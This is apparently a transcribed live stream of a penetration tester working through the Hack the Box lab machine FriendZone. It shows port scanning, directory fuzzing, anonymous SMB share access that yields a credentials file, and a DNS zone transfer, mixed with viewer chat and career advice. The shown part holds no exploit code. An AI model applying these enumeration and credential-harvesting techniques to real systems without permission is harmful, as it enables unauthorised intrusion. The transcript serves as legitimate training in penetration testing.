We're going to use RustScan as I always do every stream. For those who don't know, RustScan is a very fast port scanner. It runs Nmap in the background, and it is not installed on Kali Linux by default. To use it, it's very simple. It's RustScan-A. A stands for address, so this is our IP address. -R stands for range. We're scanning port 1 through 65,535. And you can see it's super fast. We already have ports 22 open, 21, 53, 80, 139, 445, and 443. What's up, WireDogSec? Welcome back. How you doing today? Glad to see you here. Yeah, sorry it took me so long to go live. I was actually having some technical difficulties, unfortunately. Alright, so we have all these ports open. We'll just run this one more time. Sometimes RustScan's so fast that it misses ports, so I like to run it more than once. I'm going to rename this to VPN so I know what that tab is. And then we will open up our web browser and we will navigate to the IP address. And we have a web site here. Have you been friend-zoned? FriendZone. If yes, try to get out of this zone. Winky face. Call us that number. Alright, first thing I want to do is I want to do view page source, see if there's any hint. I'm not seeing anything here. Could be some obfuscation in the file. In the picture, I mean. Alright, we have same results here. So what we're going to do is we're going to do my Nmap scan to do some more in-depth scanning. So RustScan is really just to tell me what ports are open, and then this RustScan is going to tell me, this Nmap scan is going to tell me, you know, what versions are running on this thing and what services are running. So we're doing ST, that's a TCP scan. -A is a combination of -O, SV, and -SC. -O is operating system detection. -SV is service version detection. -SC is this Nmap scripting engine. -script vuln is the vulnerability script that isn't part of the -SC, which is why we have to do -script vuln. -PM means we're skipping pings. -P is ports, so in this case we're doing 21, 22, 21, 22, 53, 80, 139, 443, and 445. And then our target IP address. So we'll push enter on that and we'll let that run. We'll rename this tab to Nmap. We will now I want a Furox bus, so directory fuzz the target here. And before we do that, let's just do nano/etc host, and we're going to add friendzone.htb, and then we need our target IP address, which might already be in my clipboard. It is, thank goodness. Alright, Control X, Y, enter to save, and we can leave that open. This is going to be Furox Buster. And then we are going to, yeah, it looks like some SMB action here. We'll see what's going on. Friendzone.hack the boss. But before we push it on this command, we want to make sure that our Etsy host is working correctly. So we want to do, we just want to navigate to http://friendzone.htb, and it works. Okay, perfect. Now we just need to push enter on this. We'll see what happens here. So Ferox Buster is kind of like Derb Buster, Go Buster, and Derb. It's a little bit faster, a little bit more comprehensive than those other ones. I like using it. It's not installed on Kali Linux by default. You can install it from GitHub. Is the music too loud, guys? The music seems too loud to me. I'm gonna turn it down a notch. Does that seem better, guys? Or was it better before? And then, what are we doing? Oh yeah, I was telling you guys. So I do -C, so I like to close out the 401 errors, the 404 errors, and the 403 errors. -K means we're ignoring certificates. So this looks like it's a WordPress, so that's interesting. So if we, it's a directory we're listening to, so if we go to WordPress /WordPress, there's nothing here, but it is an actual directory. Let's go back. Oh. Alrighty, now, area map scans are done. And as usual, we have a lot of vulnerabilities that are popping up at us. On these old hack-the-box machines, this typically happens. Alright, let's start at the top and work our way down. So there's an FTP server running too, so as you can see, we got FTP, so we should definitely check that out. 22, this SSH, typically not the way in, but we will not rule it out until we get absolutely stuck. DNS is open. We got a vulnerability here in DNS. We got some Metasploit models for this, so that's interesting. We got some vulnerabilities for Apache. Typically not the way on these hack-the-box machines, but definitely might be one. Going down, this is all vulnerabilities for Apache. What else we have? I found robots.txt. That's kind of rare. Sometimes they say it's a common file, but honestly, robots.txt doesn't always. Seriously? They just said seriously? Nothing here? Alright. They're just trolling. They're just trolling. So there's a WordPress blog. We already found that. We got a Samba server running here. So I'm assuming it's a Linux. Let's scroll down and make sure that's actually true. I mean, Hack-the-Box tells us if it's Linux or Windows, but I didn't even look, honestly. So I don't even know that. By the way, for those that are just tuning in, or if you've managed to watch this far into the video, these videos, when I do live streams, these are boxes that I've never hacked before. So I'm going in blind. This is black box penetration testing here. So yeah, I don't even know if it's Windows or Linux yet. I didn't even look. Okay, looks like it's Linux here. We get Linux, nothing. Yep, all Linux stuff. We don't know the exact version, but we know it's Linux. Enum for Linux, yeah, that's might be the way forward. The Samba server definitely looks good, and then the FTP looks like it could be interesting. I like when there's SMB and FTP open because it's a nice break from the web exploitations that we normally do, you know? So we got SMB vuln to the servers, Microsoft Windows systems vulnerable to denial servers. Oh, that's gross. I don't want that. Okay. Well, let's just see if there's an anonymous login here. So let's do FTP FriendZone.htb. Anonymous. No password. Login incorrect. Login failed. Okay. Well, it doesn't allow anonymous logins, so let's try. Let's go to my GitHub here. And we're going to pull up some more Samba commands. What's Feroxbuster doing over here? Nothing? It's finding nothing over here. We got the same JPG file. We have WordPress. Yeah, it hasn't found anything yet, guys. The version might have some vulns. Yeah, you might be right about that. I guess before we move on to SMB, let's go back to FTP here. Let's look up this version. That's a good point. We should not move to SMB before we even check the version number on this. Remote denial of service, multiple. I don't have I don't want to do a denial of service. This is a back door. This module requires Metasploit. Alright, well, is it a Metasploit thing? Let's try admin password. See if that works. Only remote denial of service, but they said there's a Metasploit module. GlobalScape secure FTP server. (234) and 232. Which one we got? Neither one of those. But this might work. We got a lower version than that, so let's use 1 maybe. Backdoor command execution. Our version number is lower than 234, right? Oh no, it's not. Yeah, it's not. We have this version on 2.3.4. We're running 3.0.3. So I'm assuming that this one doesn't work. Suit info. Yeah, this is probably not gonna work. Alright. Well, that's good to know. Yeah, if we find creds, we can definitely might be able to check out the FTP server later. If we do happen to find creds. For us, Buster still doesn't find anything. We do got a couple other word lists we can try, but the fact that it's finding absolutely nothing right now is a little concerning. Well, we did try at HTTP. I guess we could try HTTPS and see if we can get anything on HTTPS after this, because it is running HTTPS as well. So let's do let's check out, see what's running on port 445. So we got a Samba server 3 dot something to 4 dot something. That's not a very accurate, but we got a NetBIOS as it's in Samba. Let's run that. Let's see if we can log into the Samba server or something anonymously. Let's go back to my GitHub here. Close out of this. What's up, XPicked? Welcome to the stream. Thanks for stopping in. Glad to see you here. How you doing today? Alright, now we're going to go to my hacking notes, and we're going to go to my EJPT notes, wherever those are. Here they are. And enumeration and SMB. It's just enum for Linux and then the IP address, so enum for Linux. And then -o just tells the operating system stuff. I think it just works like this. We just do enum for Linux and then IP address. Oh, alright, we got a lot of information here. Allow sessions user username, password. Username blank, password blank. So it allows for anonymous logins. We do have a development file, share name, general, and files. So we do have 3 different shares that we can potentially get information from here. What's -a mean? So these share names are very important. I'm going to put this in my notes. I'm doing good. Expect. Thanks for asking. Glad to see you're doing good as well.
Access granted.
CyberShark77, thanks for subscribing over on YouTube. I appreciate it. Do you do a lot of pen testing? I do. That's what I do every day, all day. Straight up. That's what I do for a full-time job. And I practice my pen testing skills a lot of my off time. I'm doing 2 Hack the Box streams a week, and they're about 4 hours, so I spend 8 hours a week on Hack the Box. And I try to study for another like 15 to 20 hours a week. Pen testing stuff. However, the content creation takes up almost all my time, so I haven't been studying as much as I want to, but I am going for some other certifications at the moment. Specifically OSWA. I got an exam actually in like 2 weeks. Ugh, gross. I woke up today and realized, I'm like, oh my gosh, I got my exam in 2 weeks, and I need to start buckling down on my studies. I'm gonna go ahead and close out of this. This isn't doing us anything right now. I just want to do I need to log into these shares. So the best way to do that is SMB client. With the null login here. So we will paste this. So our IP address is over here. Copy this. And we will paste this. And in the share, one share name was files. See what happens here. Access denied. Alright. We also have general. Oh, we just logged in general. So let's do an ls here. We got creds.txt. Let's go, dude. Please, you guys. This might be a troll. This might be a troll. Let's do. How do we? Can we just do get creds.txt? Is that how that works? Getting file. Okay, I think that worked. I think we got it. Which would have a file called creds. Yep. Okay. Let's remove all these FurRocks instances here, and then we will change directory to hack the box. Make directory not FriendZone, FriendZone. Change directory, FriendZone, and then we will move creds.txt here. So we should have creds. Yep, cat creds.txt. Creds for the work, for the admin thing. Admin, work, hallelujah. Creds for the admin thing. Well, this looks like a real password. Let's try this on FTP. Maybe we need to use this on another SMB share. Let's try this on FTP first. I want to exit. I'm going to exit out of Metasploit here because we're not using it. And then we will do FTP. Who just joined the stream? Julio, thanks for stopping in. Glad to see you here. Also, Cybershark, thanks for stopping in. Hello, I was just scrolling through YouTube and came across your channel. I guess I found someone new to watch from now on. Nice! Yeah, I make a lot of hacking and cybersecurity content. If you're into that kind of thing, you came to the right place. And I'm assuming you're into cybersecurity because your name's Cybershark, which is a cool name, by the way. The background music is kind of good. This one's a little bit different. This is the same artist I normally run, but this is like more ambient. You know, it's a little more creepy, I guess. I decided to. Well, that's the reason why the stream was late today, WireDog. He joins as soon as the stream starts. It's crazy. It's amazing. I appreciate the support. But the reason why the stream was late is because I was having trouble with the music, so I had to like switch it up a little bit today. Because my Spotify app on my computer wasn't working, so I had to like improvise, and I had to download a bunch of music like right before the stream. Anyways, we need to log into this FTP server. The admin credentials might work here, so we can do FriendZone. dot hack the box, and then the name is admin, and then do I have the yeah, I do have this. Paste it in my clipboard. Did it work? Did it work? Did it work? Please work. Didn't work. All right. That did not work. That's okay. It might work for the other shares. That's the only file on SSMB shares is cred.txt. Okay. We just gotta figure out where to use these creds at. It says creds for the admin thing in all caps. I wonder why they all capitalized thing there. Anyways, let's check out the other shares. See if we get anything useful here. That's not the creds for FTP. Alright, so let's try the same command, but instead of general, we're going to try to log into development. Oh, this one worked. Let's see what's in here. There's nothing in here. So we logged into it successfully, but there's no files or directories. Is there okay. Either that or a login portal. Yeah, Furrock's supposed to find the login portal, which it did not. It found nothing, dude. So let's change the word list here. Nazir, welcome to the stream. Thanks for stopping in. Glad to see you here. How to start in bounties. Being a total noob, I am the Google Cyber Cert. I'm doing the Google Cyber Cert and just going through CompTIA Triad training courses to get good foundational in tech. How should I start in web pen testing? Well, you're on a good start. I think the CompTIA Trifecta is definitely a good way to start your tech career. And that's typically what I recommend, although I do recommend skipping A+ and going straight to Net+. But A+ isn't going to hurt you, but I don't think it's going to help you that much either at the same time. So if you want to save some extra bucks and some time, you can honestly skip A+ and go straight to Net+. I don't have an A+. I went straight to Sec+, and then I went backwards a little bit to get Net+, which is a good move to make because Net+, like, just because you have Security Plus doesn't mean you know everything in Net Plus, if that makes sense. So I would get Net Plus, then Sec Plus. I'm gonna make a video about this later this month, but yeah, stay tuned in the coming weeks. That is gonna make this more straightforward. But yeah, after Sec Plus, if you want to be a web pen tester, I would go Pentest Plus, and then after Pentest Plus, I would do EJPT or the TCM Security Junior Penetration Tester, and I would recommend the Junior Penetration Tester from TCM because it's a good for life cert, whereas the EJPT is not. And then what I would do, if you want to get into web pen testing specifically, I would do the Junior Web Pen Tester cert from TCM after the Junior Web. Well, no. Do the Junior Web Pen Testing cert first. If you only want to do web pen testing, that's where it's at. Do the Junior, and then do the non-Junior one, which is like the TCM Security Practical Web Tester or Pen Tester or whatever it's called. Hopefully that makes sense. Like I said, I'm gonna have a more clear path in videos. I can only make so many videos, and I'm trying to put them out there as much as I can. So I drop a new video every Friday. And then I drop a podcast episode every Wednesday. For those who don't know, I have a podcast called The Hacker's Cache. A little bit biased, but it's a great hacking podcast to listen to and watch. Alright, so what was I doing? Oh yeah, we're grabbing a new word list. We're grabbing a new word list for Ferox here, so go ahead and grab it here. And I'm gonna do directories first. If I can spell directories. Directories. There we go. Hopefully this finds something. Go back to SMB here. Where was my SMB? There's nothing in this one, so we're gonna exit here. Let's go back to my notes, and that's it. So maybe files has admin access. So what we're gonna do is we're gonna log in as admin maybe. So let's go back over to my GitHub, and we will grab almost the same command, but this time it's gonna be a dash username. So we're gonna paste this here. So username is admin. The share is files with a capital F, and then the target IP is the same one as before. Actually, I'm on the wrong tab. Let's go ahead and copy this. Oop, didn't mean to open up that. I'm going to open up my existing one. So we will copy our IP address and we will paste it here. Actually, slash goes here. Remove this slash. Okay. Password. Let's try that password we found earlier. Paste it in here and see if that works. That did not work. Access is denied. So where does this password work? Well, let's go back to our nmap. So what's up, Charles? Welcome back to the stream. How you doing today? Glad to see you here. Where else can we try these creds, dude? Maybe SSH? I doubt it. I doubt it. But it's worth a shot. I see port 80 open. We're not finding anything on port 80. See, we've already messed with the SMB share, so that's not. That's how where the creds go. Creds can be run on an internal way. Need to find initial access some other way, but we might have to use Ferox Buster on HTTPS. That's our next move, guys. Because HTTPS and HTTP can be running two completely different things. Yeah, that's what I'm thinking. I'm thinking, let's just try SSH and just see what happens here. Admin at FriendZone.htb, and then we will see if these creds work on the box. Denied. Okay. I think it's for a web login portal. Yeah, you're probably right, but we're just not finding it. Ferox ain't doing it for us. It's almost done here. And then after this, we'll try HTTPS. We see /WordPress. You know what? We can do WPS scan. That's the WordPress scanner. WPS scan -- URL HTTP : FriendZone. Not friend. friendzone.htb/WordPress. Maybe, I don't know. See if that does anything. Seems like you have not updated the database for some time. Do you want to update it now? Sure, we'll update it. The remote website is up, but does not seem to be running WordPress. See, that's what I was thinking. I was thinking it was a fake WordPress myself. Nothing, dude. Alright. Well, let's do... Let's do HTTPS and see if it finds anything different here. See if there's anything running on 443 that's not running on port 80, which is a possibility. Typically, 80 and 443 mirror each other, but you never know. I'm actually going to try to log into this other share, the development share with the admin credentials, not development. Because we logged into development, but there was no files there. Maybe, you know, if we log in with admin, we can see files. Maybe that's a possibility. No, same thing. We logged in successfully with admin with that password, but no files there. Okay. Let's go ahead and exit out of this. Sorry, I like to clear my terminal up because I like it clean when I'm done with what's on the screen. What's up, NeoFetch? Welcome back to the stream. Glad to see you here. How you doing today? Bro, you have such informative videos. I'm surprised that you're not in the spotlight. Well, I appreciate the kind words. I do make... Literally, that's the goal of YouTube, is to give you all my knowledge. Literally, is what the purpose of the YouTube channel is. Unfortunately, I can only make videos so fast. You know what I mean? So, eventually there's going to be... There's so many ideas. I mean, I got a list. I'm not even kidding. Like, I probably have a list of like 50 video ideas in my notes that I just want to make, you know, and there's so many video ideas that I have, and I just don't have the time to make videos all the time. But there is, yeah, there's a lot of, I do make a lot of content, and I love it. Alright, we got to figure out how to use these creds. I don't think Verox Plus is still not finding nothing. Creds for the admin thing. Creds for the admin thing. Wonder where it could be. Let's go back over here. Robots TXT, nothing. FriendZone portal.red. Ah. This is a head scratcher. Yeah, YouTube was hating a while back. They took my video down and they struck my account and stuff. It was very unfortunate. What was WinPPY used for again? I'm not sure. No, there wasn't anything on view page source. It's just the same stuff that we can see. There's this image here. See if there's any information in here, I guess. What's that tool that we used before? To see if there's anything obfuscated in it? Forget the tool name. We used it a few boxes ago. Was it irked? It was irked. Wasn't like obfuscate or XF? Was it XF tool? Oh yeah, it was Steg. Steg hide, that's right. What's the name of the file? One of these ones. It's somewhere in here, I think. Did I not download it? Save image as. It's in my downloads. It should be JPEG. Why is it not popping up? Oh, there it is. I just overlooked it. Enter passphrase. Is it passphrase? Let's try that passphrase that we used earlier. That we found earlier. This might be it, guys. Can I extract any data with that password? Let's try that again. Let's make sure I actually pasted that in correctly. Nothing. It's in purple. I don't know why the purple. It should have stuck out like a sore thumb, but it didn't. I don't know why I couldn't see it. Judas, welcome to the stream. Thanks for stopping in. You can send me a friend request on Discord. I'm not on Discord that much, but I do check it every once in a while. I do have a Discord server. You can get the Discord server links. It's all over my YouTube. I need to update my Twitch and Kick to reflect the link, but the links are all over my YouTube channel at the moment. Alright, I don't know what to check next. I'm running out of ideas, guys. Stegcracker is a steganography brute force utility to uncover hidden data inside files. That might be handy. Is that in is Stegcracker? It's not installed by default, but we'll install it. I'm thinking more enum needs to be done on the website directories. Man, I don't know. I'm doing all the enum I can do. I mean, these are pretty big word lists, man. It's not like these word lists that I'm using are tiny. I've never had a situation where I have 3 word lists that I like to use. I never had a situation where if I use all 3 of them, nothing pops up. This will be the first. I mean, obviously, there's other word lists we can use. But like I said, these are pretty big word lists. Stegcracker file word list. Stegcracker, the file is /home/Kali/downloads. What's the name of the file? It's like F something. FZ. And then we'll use rocky.txt, I guess. You would fuzz behind /WordPress. It did fuzz behind /WordPress because Farok's Poster automatically does recursion, and it didn't find anything. rocku.txt. Let's see if StegCracker works. If Steg hide asks for a passphrase, does that mean there's something in the file? Or not necessarily? I don't know. We'll let that run for a minute. That's a good tool. I didn't know about that tool. StegCracker. Oh wait, what did I... Oh. It's asking for the password. I was like, did I log into somewhere? This is SSH. The password doesn't work here. Yeah. But see, it found WordPress, right? And it did do a brute force. All 62,282 words it used on /WordPress right here. It didn't find nothing. I mean, also on this word list, which is 220,546 words. It's a very big word list. And the fact that it found nothing is a little interesting. I mean, maybe if I don't filter out the errors, how many errors did we get? I don't think we got any errors. Oh yeah, we did. We got 6, 7, 8, 9, 10. We got 10 errors. I don't think the errors matter though. I don't want the errors. This one's a doozy, man. How did... That's so weird to me. The next thing we can check is these vulnerabilities that Nmap found. You know what I mean? DNS is open. Maybe we gotta do a zone transfer. I think that's what we gotta do, guys. Let's do a zone transfer. Maybe we can find some subdomains. That's what we need to find. We need to find subdomains. Alright, so dig x fr at DNS server. So the DNS server is this IP address. And then domain name. What is our domain name? Isn't it? I guess it's just friendzone.hcb maybe? Can we just try that? See if anything comes out of that? Transfer failed. What if we reverse that? Instead, yeah, we'll just reverse that and that and see if that changes anything. Probably won't, but try with .red. Yeah, I guess you're right. FriendZone portal.red. Yeah, that's a good point. Oh, that worked. Admin FriendZone portal.red. Alright, that's perfect. Exactly what we wanted. You know so many different attacks? Bro, I feel like I know like not even 10% of the attacks. Dude, I do know a lot, I feel like, but at the same time, I feel like I don't know that much. I'm like, oh man. I just know, well, the reason why I need to try zone transfers is because there was one time, like, that was the way forward in a hack the box machine. When DNS is open, like, always do a zone transfer. Like, this is pure, like, you see DNS and you don't see any other ways, zone transfer. Alright, so we gotta, so there's admin, files, import. So what can I do? Can I just add this to my SEOs file and then just do it? I think FriendZone portal.red. Here's what we need to do. We need to split this up a little bit. And we want to do nano Etsy hosts and nano slash Etsy hosts, and we're going to add all of these to my Etsy host file. We're going to copy this, paste that, paste that, paste that. We need this IP address several times. And then we're just going to copy and paste all of these domain names in here. So FriendZone portal.red. We're going to paste right here. We're going to admin FriendZone portal.red. We will copy this. Paste that there. We will do files.friendzone portal.red. And we will paste that right here. Imports.friendzone portal.red. And we will paste that right here. And VPN. We will paste that right here. And friendzone portal.red. We already have that in the file. We can actually get rid of this line. There we go. So we just added all of these. Control X, Y, enter to save. Now, if we navigate to FriendZone portal.red, copy this. See what happens here. It just took us back to here. Maybe, did I do this right? You also try manually checking a FriendZone portal read in the browser. That's what I just tried. It just took us back here. Let's try the subdomains. Let's try admin. Nothing? Get rid of that other one? Yeah, that's what I was thinking too. There we go, that worked. We will proceed to the admin.friendzone portal. Oh, here we go. We can use our creds here, I think. Paste the password here. Log in and break some friend zones. Spread the love. Log in. Admin page is not developed yet. Check for another one. What do you mean check for another? Yeah, I want us to view page source. Yeah, we need to check for rocks on this. 100%. Where is my Ferox? I didn't watch that video by Dave Obama, although I did see the thumbnail. So I know kind of what you're talking about, Charles. My thoughts on it. I'm not really too knowledgeable on that, to be honest with you. But it's definitely plausible. I mean, from my limited knowledge, I mean, like attacking batteries and phones, 100% plausible. You know what I mean? And your phone is it's literally a grenade in your pocket. I don't know if people realize that, but it really is. Like, so I want to give you a story. So one time I had a phone that had a cracked screen, and I wanted to replace the screen because I didn't want to take it to a phone shop repair because I wanted to save money. YG Cha, thanks for subscribing over on YouTube. I appreciate you. So I was replacing the screen myself, and because I wanted to save money. And one of the things for that phone, it was a Samsung S. No, I can't remember what model it was. Samsung S8. I can't remember the model, but it was something like that. And one of the ways to get in, you have to go in from the back of the phone. So you have to take the back cover off, then you have to take off another thing, then you have to take out another thing, and then it's like, okay, and now you have to take out the battery to get to the screen. So it's kind of weird to like replace the screen. You have to go into the back of the phone. It was kind of strange, but you have to take out pretty much all the guts of the phone. And one of the steps was, hey, you have to cut the battery out, and because the battery is glued into the phone. And you know the directions on YouTube was like, hey, you have to take an X-Acto knife and like, you know, cut the glue around the battery and pull the battery out. Well, I mean, I barely touched this battery with the knife, and this thing went up in flames. Like, it was like, it blew up. I'm not even kidding. Like, it was crazy. I thought my house was gonna burn down, dude. Zorzox, thanks for the follow. I appreciate you over on Twitch. So yeah, your phone is a grenade in your pocket, and the fact that you could potentially hack it to, you know, disrupt the battery is 100% plausible. It's really scary, but it's true. I don't think the Lebanon attacks was a cyber attack. I think it was a supply chain compromise. Yeah, that's most likely what it was. But I wouldn't rule it out a cyber attack either. I wouldn't. I mean, you can't rule it out. What's up, Adrian? Welcome to the stream. Thanks for stopping in. Glad to see you here. What's up, Nia Tokyo? Thanks for stopping in. Glad to see you here. Have you done PNPT? How is it compared to OSCP? I have not done the PNPT, so I can't give you an accurate answer to that question. Phone batteries don't explode like that. Had to be explosives packed in the devices. Yeah, probably. I mean, my phone didn't blow up. It just caught on fire, right? It's not like it blew up my face. So, yeah, that's a good point. But I still think there is a potential to make a phone battery blow up like that. From what I've seen, because I'm telling you, I've never seen something erupt in flames so fast. It was pretty scary. He said, but Mr. Robot, they hacked phones but they blew up. That is true, that is fiction. But all the attacks in that show is plausible, dude. I'm telling you. I think having a phone blow up from a cyber attack is extremely plausible. Maybe not to the extent of the like Lebanon attacks. I don't want to get political, but we're just talking about the facts here, like what happened. You know, it's definitely possible to make them catch fire, 100%, because I've seen it with my own two eyes. My phone caught fire, and I literally threw it outside, and it literally was like, it did a mini explosion. I'm not even kidding. Like, it was a mini explosion. And you could easily burn your face off if it blew up in your face. It would burn your face pretty bad. Dude, we can't find anything on admin.friendzone.red. So let's try. Did you file a complaint? Me? Nah. Because I'm the one that, I don't know if he was here for the whole story. I'm the one that caused it. I was trying to cut out the battery out of the phone because I was trying to take the battery out to fix the phone screen, and I hit the battery with my knife, and that's what caused it to catch fire like that. That was 100% my fault. Yo, a cat, welcome to the stream. Thanks for stopping in. Glad to see you here. It's always nice when there's a cat in the stream, you know what I mean? We gotta log in PHP. We already found that though. See? The admin page is not yet developed yet. Check for another one. Well, let's try these other ones. We got files. Files at FriendZone. Okay, that's nothing. Let's try imports. Nothing. Okay, let's try VPN. VPN. Let's run that one. Same thing. All the same. All the same. He said, admin page is not developed yet. Check for another one. We are checking for another one though. And I'm not seeing nothing. The username and password worked. The ones that we found earlier. But I can't seem to find another login page, another admin page, unfortunately. Can we do another zone transfer? Is that even possible? Can we do a zone transfer within a zone transfer? No, that didn't give us nothing. Maybe a dev site? Well, there is no .dev. Did it? Yeah, I don't. I see admin. I see files. I see imports. I tried all of these, but none of these beared any fruit. You know what I mean? They all go to the same place. There's also those other subdomains. I tried them all. They all go to the same. They all take me to the same thing. I could fuzz these other subdomains, but I don't want to fuzz more than one thing at a time because I don't want to break the box. So I'm waiting for admin to get done fuzzing, and then once admin's done fuzzing, then I'll fuzz the other subdomains. But as far as like what's on these pages, it's all the same. You could fuzz the domain itself? Yeah, that's a good point. Yeah, we haven't done that. You're right. It's still too loud, right? Is that good? Is the volume good on the music right there, guys? What's the objective on this box? To get root. The root is always the objective. The way to get to root is always different. Right now, I have no idea how to get to root. We gotta break into the box, get initial access, and then elevate our privileges to root. So right now we're trying to break into the box for initial access at the moment. That's what I'm trying to figure out. And Furrock's Buster is going slow because we're kind of hitting it kind of hard with this. But I really don't want to do anything until see how it goes like a bunch at a time and then it stops. I can't. I want to let this run until it's finished, and if we get no response, then we'll do the same thing against FriendZone portal.red by itself, and then see what we get. Is this HTTPS? No, it's not. Well, that's where we're messing up, right? I think that's where we're messing up. I think it's not HTTPS. Let's try. You know what? Let's cancel this. I think the domain would have something behind it. Let's get rid of HTTPS and just do HTTP. And then let's do FriendZone portal.red. Maybe. I don't know. We've already kind of scanned for this though. Yeah, see, it's giving us the same stuff as it did before. /WordPress. How do I resume this? How do I resume a session? I think we've already fuzzed this, guys. Let's go back to fuzzing the admin page. Well, we've already fuzzed the admin page halfway, so we can return to that later. Let's just try files, I guess, maybe. See if we get anything here. Yeah, I don't think FriendZone portal.red fuzzing that's gonna do anything because we basically fuzzed it already. We give it a different name. We always override the name. So we'll see what happens here. We'll fuzz files. This box got slower. It's getting slower as time progresses because we're hitting it so hard with these scans. I wish there was a way to speed it up. That's really the only thing I got that I can try. Well, let's try Statecracker. Statecracker is not finding anything. I don't think it's the way, guys. I'm going to close out a Statecracker. It's eating up my computer's resources at the moment. Maybe that's why Ferox is running slow. No, that didn't help it at all. Actually, it's still running slow.
Access granted.
Cosmos, Power of Galaxy, thanks for subscribing on the YouTube channel. I appreciate you. This is so slow. I don't know what I should do. Should I revert to machine and keep and hammer this? I think that might be the way. Because it was going pretty quick earlier. Like we could go through the whole word list relatively fast. But now it's like kind of slow, and there's nothing else I could check. I've tried his admin credentials everywhere. And it clearly worked here. Admin page is not developed yet. Check for another one. We just gotta find another page, but I don't know where to. Fuzzing's the way to go right now. It's telling me check for another one. You can't view the page source on this, unfortunately. I don't know why it won't let us view the page source. Oh, there we go. ZZZZZZ. What does that even mean, bro? Huh? What's that mean, dude? Is it? Watch it be /ZZZZ. Dude, did that just work? Hold on. Oh no. That would have been funny if it did. Try a different word list. ZZZ as in sleep. That's what I'm thinking, but like, what's that mean though? You know what I mean? Like, I don't know what that means, bro. How is it only saying ZZZZ? Why is it not giving me the other information? You know what I mean? Like when I view page source, shouldn't it tell me? Shouldn't it have this? You know what I mean? How does it only say ZZZZ? It should at least say this in like HTML headings, right? I don't understand how it could just be just ZZZZ. It's mind blowing to me. What if we tried /thing? No. The reason why I tried that is because the cred file was said creds for the admin thing with all caps thing, so maybe that was it. I don't know what to do. I think reverting this box is the way forward. Because it's so slow right now. Let's revert it. I could scan way faster if it would just... It was going fast, you know what I mean? It wasn't... It was going pretty good, going pretty well. But now I can't scan as fast because... I don't know, we wore it out, guys. We'll revert the machine and we will continue on. Look at their user rating on this. People are saying it's a medium box. So this one probably isn't that easy if people are rating it that at the medium level, you know what I mean? And medium machines, they take more time. And sometimes Hack the Box gets the ratings wrong. That's why the user ratings are very important. I'm glad they allow people to rate users. Allow to do user ratings, and right now I'm starting to agree that yeah, this initial access is at the medium level. It feels like. No, there wasn't anything on the source put on the original page. Let's I mean, I can pull back up for you if you want, but I'm like 99% confident that there's nothing else involved with the... Alright, we gotta change all those IP addresses. Close out of this. Let's go back to Ferox here and go ahead and clear this out. I mean, I'm having trouble saying your name. Is it Sarah BH? Thanks for stopping in. Glad to see you here. How you doing today? Sarah BH91P. Appreciate you stopping in. Alright, let's try this one more time. On admin, maybe. Let's see, hopefully it goes fast. See, it found login PHP, which is fine, but it's going back to slow again. I think it's my Kali box that's slowing down. I don't know what. I'm not doing nothing. That's the only thing running. It's the only command running at the moment. So it wasn't the box being slow. It's my Kali VM being slow. It was going faster than this earlier. I don't know what to try. So you're saying go back to the main page and check the source code? Oh, we gotta put an F right here. Oh wait, what? How is this different? Oh, it's how this is different now. How is it? That's weird. Okay, well let's view page for this is not how it was earlier. Title watching you. Good. Source z.gif. FriendZone portal.red. How is this possible? Well, what happens if I type in VPN? This wasn't like this before the revert. Yeah, this is completely different now. Nothing at VPN FriendZone. I gotta try files. Yeah, I'm thinking something got cached. That's all I'm thinking too. Nothing at files. What else was there? There was admin, files, imports. Oh, that makes sense. FriendZone, aka zone transfer. Ah, that makes sense. That is pretty clever. Yeah. Admin page is not developed yet. Maybe the box is messed up. Yeah, that's what I was thinking too. I don't know. I can only fuzz one thing at a time, I think. Well, I don't know. Let's just try it. Let's just hammer it home. If we break it, we break it. We're gonna fuzz on other things simultaneously. Let's just do FriendZone portal.red. I would try the zone transfer again. Oh, really? Yeah, it's worth a shot, I suppose. FriendZone portal.red, FriendZone portal, FriendZone portal. That's the same results. Localhost root. What's up, Rare Style Gaming? Welcome to stream. Thanks for stopping in. Glad to see you here. How you doing today? What hack is this? This is Hack the Box, FriendZone. Right now, we're trying to get initial access. We have found some admin credentials for this admin page, but then they say the admin page is not developed yet. Check for another one, and that's what we're doing. We're checking for another one, trying to find another admin page. And once we find that, then we can probably log into something, and then get more information and go from there. But we're really stuck at trying to figure out where this other admin page is at the moment. Guys, while this is running, I'll be right back. I'm gonna take a quick break. I'll be back in a minute or two. Alright, I'm back. Are you able to fuzz that with FF or something? There has to be more subdomains. Yeah, you might be right about that. We gotta brute force subdomains maybe after this. Admin's done. Oh, it found a bunch of stuff here. Understanding SSL. Fish alert. Look at all this. It found a bunch. All this. Copy selection here and alright, copy and paste these. Put that in my notes. Let's go back over here. So slash index 1318. See what the heck's over on that. What? Understanding. Oh my gosh, why did this just happen? Close. Understanding SSL. I don't know how I got status 200 out of this. Just give me 404 errors. I think Ferox is giving me some bad info. They say it was status 200s, but they're really not. Webmaster 2003. I think Ferox Buster messed up. Webmaster underscore 2003. No, Webmaster hyphen 2003. Yeah, this is nothing. These are all not accurate, unfortunately. I've never seen Ferox do that to where it says, hey, it's a status 200 when it's really a status 404. Probably because I'm hitting it too hard. MSO 2034. Yeah, I think we need to. Yeah, I think you're right. We got to fuzz for some subdomains. Fuzz dot FriendZone portal dot red. DNS subdomains top. Alright, there's subdomains right there. So this will fuzz subdomains. See if we get anything here. NS3 and NS1. Dub makes sense. I mean, let's just try dub. WW. That's not what I wanted. This is actually a real domain. Okay, that's not what we wanted to do. NS3. NS3. I don't know why this keeps popping up. I want this gone. Okay, NS3. And NS1. I'm assuming NS1 is probably the same thing. Let's close out of this Ferox Buster here. It's so slow. It's like I'm just gonna go to guided mode now. We're kind of, hey, I'm over the hour-and-a-half mark here, and it's like, let's go to guided mode. I don't know what else to try. What is the common name of the box given the TLS certificate on one of the open ports? FriendZone. No, it was. No. FriendZone portal. What wasn't the common name for the box given on the TLS certificate? How do I not? Why can't I see this? It's not FriendZone or FriendZone. Maybe I need FriendZone.red. Dude, that's weird. I could have sworn it. It is friendzone portal.red. It's not. That's not the answer apparently. What is the common name of the box on a TLS certificate on one of the open ports? I think it's in this map output. I could have sworn it was like friendzone. Maybe it's friendzone.htb. That's why I had it. Oh gosh, so much output. Host friendzone. You know what? If we do this. The organization's code red. Is that what it needs? We tried friendzone. Do they want the name? Code red is the organization that issued it. No? Well, why can't I answer this question? Friendzone.red, we tried that. Bro, I don't know what you mean. Like, that's the answer. What's a common name for the box given to the TLS certificate on top of one of the open ports? Let's go ahead here. Make sure to use the -SC and -SV at the end map. We did that. It's not telling me nothing. Should be my nmap output, but I don't see anything in the nmap output that would say anything like that. Is it just friend zone? This is wild, bro. 